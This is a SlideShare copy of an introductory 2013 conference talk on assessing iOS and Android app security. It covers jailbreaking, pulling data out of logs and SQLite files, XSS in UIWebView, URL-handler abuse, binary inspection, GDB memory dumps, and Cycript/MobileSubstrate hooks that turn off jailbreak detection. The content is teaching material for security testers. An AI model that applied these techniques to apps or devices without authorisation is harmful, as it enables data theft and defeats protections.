SlideShare ist ein Scribd-Unternehmen logo

Mobile Security Assessment: 101

W
wireharbor

BSides Chicago 2013 presentation by Trey Keifer of WireHarbor Security (http://www.wireharbor.com) on Mobile Application Security Assessment

Technologie
1 von 38
Intro to Mobile Security Assessment: Tools and Techniques Copyright 2012 WireHarbor Security, Inc.
Who am I? • Founder/President - WireHarbor Security, Inc. • Previously: Led Global Application Security for F500 Insurance co. • Focus on:  Application Security, Mobile Security, Source Code Review • Partnerships:
Agenda • Overview • Attack Vectors • Setup • Basic Techniques • Advanced Tech. • Questions
Objectives - Security Assessment • Determine the correct path to Exploitation. • Many Attacks, Weaknesses and Impacts.
RULE #1: Mobile Security Perform sensitive/confidential/dangerous operations OFF-DEVICE... ...also, we still can’t trust user input.
Mobile Assessment: Key Difference • User-access to runtime environment  DEVS: **New perspective allows us to see everything you are doing** VS...
Jailbreak vs. Rooting • Jailbreak (iOS) - Users can break out of sandbox, but are still limited by the Apple kernel. (Your iPhone is still an iPhone) • Rooting (Android) - Implement a new kernel, turn your phone into ??? I
Attack Vectors • GSM Network • GPS • Applications (Malware) • Application Vuln’s (Objective-C) • Browser Exploits • Web Services • Bluetooth • WIFI (Rogue Access Points) • NFC/RFID
Security Controls • Reduced Attack Surface • Code Signing/App Store Approval Process - iOS  Android is more of a free-for-all • Sandboxing • NX Memory • ASLR/PIE (compiler flag)  Rarely used in 3rd party applications • Certificate Verification • Device Encryption
Mobile Security Assessment • Step #1 : Jailbreak • Step #2 : ??? • Step #3 : PROFIT!!!
Jailbreak in 30 sec • DISCLAIMER: BRICK WARNING!!! • DISCLAIMER: RUNTIME PROTECTIONS BECOME NIL! • DISCLAIMER: APPSTORE DEREGULATION! • Beware of Jailbreak SCAMMERS! • iPhone Dev Team (blog.iphone-dev.org) • evad3rs Team (http://evasi0n.com/) • Android is more complicated. (SuperOneclick)  Hardware/OS/Carrier dependent
Tools • Jailbroken/Rooted Device • Cydia Applications (tcpdump, sqlite, etc...) • Android Debug Bridge (ADB) • GDB (Runtime analysis) • IDA Pro (Binary Reverse-Engineering) • MobileSubstrate/Cycript • BurpSuite (HTTP Analysis) • Xcode/Eclipse (Custom development, binary tools)
Finding Targets PLENTY of them out there… 650,000+ Applications in AppStore* 250,000+ listed for iPad •App Store:  ~/Music/iTunes/iTunes Media/Mobile Applications  .ipa file (zip archive) •On iOS:  /var/mobile/Applications/<UUID>/<AppName>.app/ *Source: Techcrunch, July 2012
Techniques The easy stuff…
Mobile Hacking 101 • Gain Access • Look for interesting data  Log Files  Databases  Crash Dumps  In-Transit • Cause interesting execution  Form Input/Output  Application Redirects
Techniques: Log File Analysis • Applications output/store lots of logging data.  ~/Library/Logs/CrashReporter/MobileDevice/<DEVICE>  /private/var/log/system.log
Techniques: Data Storage • SQLite  “Self-contained, zero-configuration, embeddable DB” • Finding sqlite files… • Automation FTW!  find . –exec file {} ;
Techniques: Data Storage • Pulling out data…  SELECT * FROM <table>
Techniques: SQL Injection • Should look familiar...
Techniques: XSS Injection • XSS is in there too...  Be careful with WebKit. (UIWebView object) “Of the 197 vulnerabilities, 142 are related to WebKit...”, ZDNet review of iOS 6 NSString *js = [[NSString alloc] initWithFormat:@”var v=”%@”;”, user]; [mywebView stringByEvauatingJavaScriptFromString:js];
Techniques: Proxy Intercept • Certificate errors are validated.  Manually install Burpsuite cert.  http://www.tuaw.com/2011/02/21/how-to-inspect-ioss-http-traffic- without-spending-a-dime/
Techniques: Event Handler Abuse • Apps can register their own handlers via plist files. o openURL:[NSURL URLWithString:@"myapp://?foo=urb&blerg=gah"];
Techniques: Event Handler Abuse • Finding interesting handlers…  $> strings <target>.app/<target> | grep "://“ | grep –v “http” <string>googlegmail://</string> <string>googlegmail://</string> <string>mgc://</string> <string>currents://</string> <string>googletranslate://</string> <string>comgoogleshopper://</string> <string>comgoogleearth://</string> <string>googlelatitude://</string> <string>googlebooks://</string> <string>currents://</string>
Advanced Techniques The FUN stuff…
Advanced Techniques: Overview • Binary Decryption  API Tokens  Hard-coded Passwords • Passive/Active Fuzzing • Reverse Engineering  Token Generation Algorithms • Runtime Execution Interception/Manipulation  Interesting “hidden” methods  Web Services API’s
Advanced Techniques: Objective-C (iOS) Primer • Abstraction of Standard C  Based on Smalltalk  Designed to be “Object-oriented easy.”  The good old days: Buffer Overflows, Format Strings, etc... RETURN!!!
Advanced Techniques: iOS Binary Inspection • Object File display tool - otool (Xcode)  Display file headers (Mach-O and Universal)  Display Crypt segment info  Dump machine code  List Shared Libraries • ARM Processors  RISC instruction set  Little-endian representation
Advanced Techniques: iOS Binary Inspection • Universal Binaries  Contain multiple versions o otool –f <file>  May be encrypted o otool –l <file> | grep LC_ENCRYPTION_INFO –B1 –A4
Advanced Techniques: iOS Runtime Inspection • Anti-Debugging (The Anti-BYOD part)  ptrace PT_DENY_ATTACH  sysctl check  Known files  Binary Packing  Code Checksums  Driver Checks  Timing Measurements  Code Obfuscation  Junk Code
Advanced Techniques: iOS Runtime Inspection • GDB  Execute/load binary  Breakpoint on start address 0x2000 (PIE may cause this to move on you) gdb $> dump memory <filename> <start address> <end address>
Advanced Techniques: iOS Binary Inspection, Unencrypted • IDA Pro Binary graphing/analysis…
IDA Pro: What to look for? • Using the Apple DEV reference  File Writes  Network Connections  Keychain Access  UI Form Fields
Advanced Techniques: iOS Runtime Manipulation • Cycript - Javascript/Obj-C Interpreter  Hook active apps via Mobile Substrate  Interact with binaries in runtime using JS http://www.cycript.org/ http://iphonedevwiki.net/index.php/Cycript_Tricks
• Example: cy# [SBAwayController.sharedAwayController isPasswordProtected] 1 cy# [[UIApp.keyWindow recursiveDescription] <KHWindow: 0x1517a0; baseClass = UIWindow; frame = (0 0; 320 480); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x151640>> | <UIView: 0x17a120; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x17a1b0>> | | <UIToolbar: 0x17a3f0; frame = (0 416; 320 44); autoresize = W+TM; layer = <CALayer: 0x17a0d0>> | | | <UIToolbarButton: 0x17d150; frame = (12 0; 26 44); alpha = 0.25; opaque = NO; layer = <CALayer: 0x17d2e0>> | | | | <UISwappableImageView: 0x17d4c0; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d570>> | | | <UIToolbarButton: 0x17d340; frame = (153 0; 26 44); opaque = NO; layer = <CALayer: 0x14a220>> | | | | <UISwappableImageView: 0x17a680; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17a6e0>> | | | <UIToolbarButton: 0x17df40; frame = (222 0; 18 44); opaque = NO; layer = <CALayer: 0x17d2b0>> | | | | <UISwappableImageView: 0x17dbf0; frame = (3 13; 18 19); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d3f0>> Advanced Techniques: iOS Runtime Manipulation
Advanced Techniques: Fuzzing • Custom scripts… (Python, Ruby, Javascript) • Dumb or Smart  Mutation-Based: Randomly substitute data.  Generation-Based: Substitute based off RFC or Standards. • Classic Targets  Any file types. (PDF, PPT, etc…)  Protocols (HTTP, SMS, Push Notifications, etc...)  Image formats (PNG, TIFF, etc…)
Passive Fuzzing - iOS • Using MobileSubstrate:
• What can we do with this?  Application Tracing/Logging (filesystem, network, etc...)  Turn off Jailbreak detection  Fake GPS data... (think: location-aware security)  The possibilities get scarier as trust grows... Advanced Techniques: iOS Runtime Manipulation
Trey Keifer 847-239-5626 trey.keifer@wireharbor.com Twitter: @wireharbor Facebook: facebook.com/wireharbor http://www.wireharbor.com THANK YOU!!!

Empfohlen

YOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS ApplicationsYOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS Applicationseightbit
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3mPrem Kumar (OSCP)
 
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterCanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
 
iOS Application Penetation Test
iOS Application Penetation TestiOS Application Penetation Test
iOS Application Penetation TestJongWon Kim
 
iOS jailbreaking
iOS jailbreakingiOS jailbreaking
iOS jailbreakingVarun Luthra
 
BYOM Build Your Own Methodology (in Mobile Forensics)
BYOM Build Your Own Methodology (in Mobile Forensics)BYOM Build Your Own Methodology (in Mobile Forensics)
BYOM Build Your Own Methodology (in Mobile Forensics)Reality Net System Solutions
 
SyScan 2015 - iOS 678 Security - A Study in Fail
SyScan 2015 - iOS 678 Security - A Study in FailSyScan 2015 - iOS 678 Security - A Study in Fail
SyScan 2015 - iOS 678 Security - A Study in FailStefan Esser
 
Jail breaking
Jail breakingJail breaking
Jail breakingRokkam Reddy
 

Empfohlen

YOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS ApplicationsYOW! Connected 2014 - Developing Secure iOS Applications
YOW! Connected 2014 - Developing Secure iOS Applicationseightbit
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3mPrem Kumar (OSCP)
 
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterCanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
 
iOS Application Penetation Test
iOS Application Penetation TestiOS Application Penetation Test
iOS Application Penetation TestJongWon Kim
 
iOS jailbreaking
iOS jailbreakingiOS jailbreaking
iOS jailbreakingVarun Luthra
 
BYOM Build Your Own Methodology (in Mobile Forensics)
BYOM Build Your Own Methodology (in Mobile Forensics)BYOM Build Your Own Methodology (in Mobile Forensics)
BYOM Build Your Own Methodology (in Mobile Forensics)Reality Net System Solutions
 
SyScan 2015 - iOS 678 Security - A Study in Fail
SyScan 2015 - iOS 678 Security - A Study in FailSyScan 2015 - iOS 678 Security - A Study in Fail
SyScan 2015 - iOS 678 Security - A Study in FailStefan Esser
 
Jail breaking
Jail breakingJail breaking
Jail breakingRokkam Reddy
 
Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.DataArt
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...Shakacon
 
from Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesfrom Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesKai Aras
 
iOS Basics
iOS BasicsiOS Basics
iOS BasicsRicha Jain
 
Mobile Device Encryption Systems
Mobile Device Encryption SystemsMobile Device Encryption Systems
Mobile Device Encryption SystemsPeter Teufl
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
 
Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.DataArt
 
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovTroopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovJose Moruno Cadima
 
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDefconRussia
 
Android vs iOS encryption systems
Android vs iOS encryption systemsAndroid vs iOS encryption systems
Android vs iOS encryption systemsBirju Tank
 
iOS platform
iOS platformiOS platform
iOS platformmaya_slides
 
IOS Encryption Systems
IOS Encryption SystemsIOS Encryption Systems
IOS Encryption SystemsPeter Teufl
 
Apple iOS
Apple iOSApple iOS
Apple iOSChetan Gowda
 
Session 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKSession 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKVu Tran Lam
 
Hacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSHacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSEC-Council
 
iOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days lateriOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days laterSeguridad Apple
 
Antid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSAntid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSSeguridad Apple
 
ios-mobile-app-development-intro
ios-mobile-app-development-introios-mobile-app-development-intro
ios-mobile-app-development-introRemesh Govind M
 
Layer architecture of ios (1)
Layer architecture of ios (1)Layer architecture of ios (1)
Layer architecture of ios (1)dwipalp
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS ConsolidatedKarter Rohrer
 
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsSynopsys Software Integrity Group
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 

Weitere ähnliche Inhalte

Was ist angesagt?

Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.DataArt
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...Shakacon
 
from Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesfrom Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesKai Aras
 
Mobile Device Encryption Systems
Mobile Device Encryption SystemsMobile Device Encryption Systems
Mobile Device Encryption SystemsPeter Teufl
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
 
Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.DataArt
 
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovTroopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovJose Moruno Cadima
 
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDefconRussia
 
Android vs iOS encryption systems
Android vs iOS encryption systemsAndroid vs iOS encryption systems
Android vs iOS encryption systemsBirju Tank
 
IOS Encryption Systems
IOS Encryption SystemsIOS Encryption Systems
IOS Encryption SystemsPeter Teufl
 
Session 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKSession 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKVu Tran Lam
 
Hacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSHacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSEC-Council
 
iOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days lateriOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days laterSeguridad Apple
 
Antid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSAntid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSSeguridad Apple
 
ios-mobile-app-development-intro
ios-mobile-app-development-introios-mobile-app-development-intro
ios-mobile-app-development-introRemesh Govind M
 
Layer architecture of ios (1)
Layer architecture of ios (1)Layer architecture of ios (1)
Layer architecture of ios (1)dwipalp
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS ConsolidatedKarter Rohrer
 

Was ist angesagt? (20)

Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.Ярослав Воронцов — Пара слов о mobile security.
Ярослав Воронцов — Пара слов о mobile security.
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
 
from Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slidesfrom Realtime Operating systems to unlocking iPhones in less than 30 slides
from Realtime Operating systems to unlocking iPhones in less than 30 slides
 
iOS Basics
iOS BasicsiOS Basics
iOS Basics
 
Mobile Device Encryption Systems
Mobile Device Encryption SystemsMobile Device Encryption Systems
Mobile Device Encryption Systems
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
 
Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.Никита Корчагин - Introduction to Apple iOS Development.
Никита Корчагин - Introduction to Apple iOS Development.
 
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir KatalovTroopers14 Advanced Smartphone forensics - Vladimir Katalov
Troopers14 Advanced Smartphone forensics - Vladimir Katalov
 
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS appsDmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
 
Android vs iOS encryption systems
Android vs iOS encryption systemsAndroid vs iOS encryption systems
Android vs iOS encryption systems
 
iOS platform
iOS platformiOS platform
iOS platform
 
IOS Encryption Systems
IOS Encryption SystemsIOS Encryption Systems
IOS Encryption Systems
 
Apple iOS
Apple iOSApple iOS
Apple iOS
 
Session 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDKSession 1 - Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDK
 
Hacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSHacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OS
 
iOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days lateriOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days later
 
Antid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSAntid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOS
 
ios-mobile-app-development-intro
ios-mobile-app-development-introios-mobile-app-development-intro
ios-mobile-app-development-intro
 
Layer architecture of ios (1)
Layer architecture of ios (1)Layer architecture of ios (1)
Layer architecture of ios (1)
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS Consolidated
 

Ähnlich wie Mobile Security Assessment: 101

Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsSynopsys Software Integrity Group
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLiphonepentest
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhonessaurabhharit
 
Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2FIWARE
 
Exploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsExploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsKoan-Sin Tan
 
Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security
 
2012 java one-con3648
2012 java one-con36482012 java one-con3648
2012 java one-con3648Eing Ong
 
openioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsopenioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsTakahiro Haruyama
 
iOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomeriOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomerAndri Yadi
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
Android Workshop
Android WorkshopAndroid Workshop
Android WorkshopJunda Ong
 
Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)ColdFusionConference
 
FI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsFI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsPetr Dvorak
 
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration TestingStephan Chenette
 
MobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsMobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsRon Munitz
 
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersMACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersJoon Young Park
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 

Ähnlich wie Mobile Security Assessment: 101 (20)

Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical Apps
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhones
 
Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2
 
Exploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsExploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source Tools
 
Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013
 
2012 java one-con3648
2012 java one-con36482012 java one-con3648
2012 java one-con3648
 
openioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsopenioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensics
 
iOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomeriOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for Jasakomer
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Android Workshop
Android WorkshopAndroid Workshop
Android Workshop
 
Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)
 
FI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsFI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS Basics
 
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
 
MobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsMobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android Apps
 
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersMACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Ios development
Ios developmentIos development
Ios development
 

Kürzlich hochgeladen

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
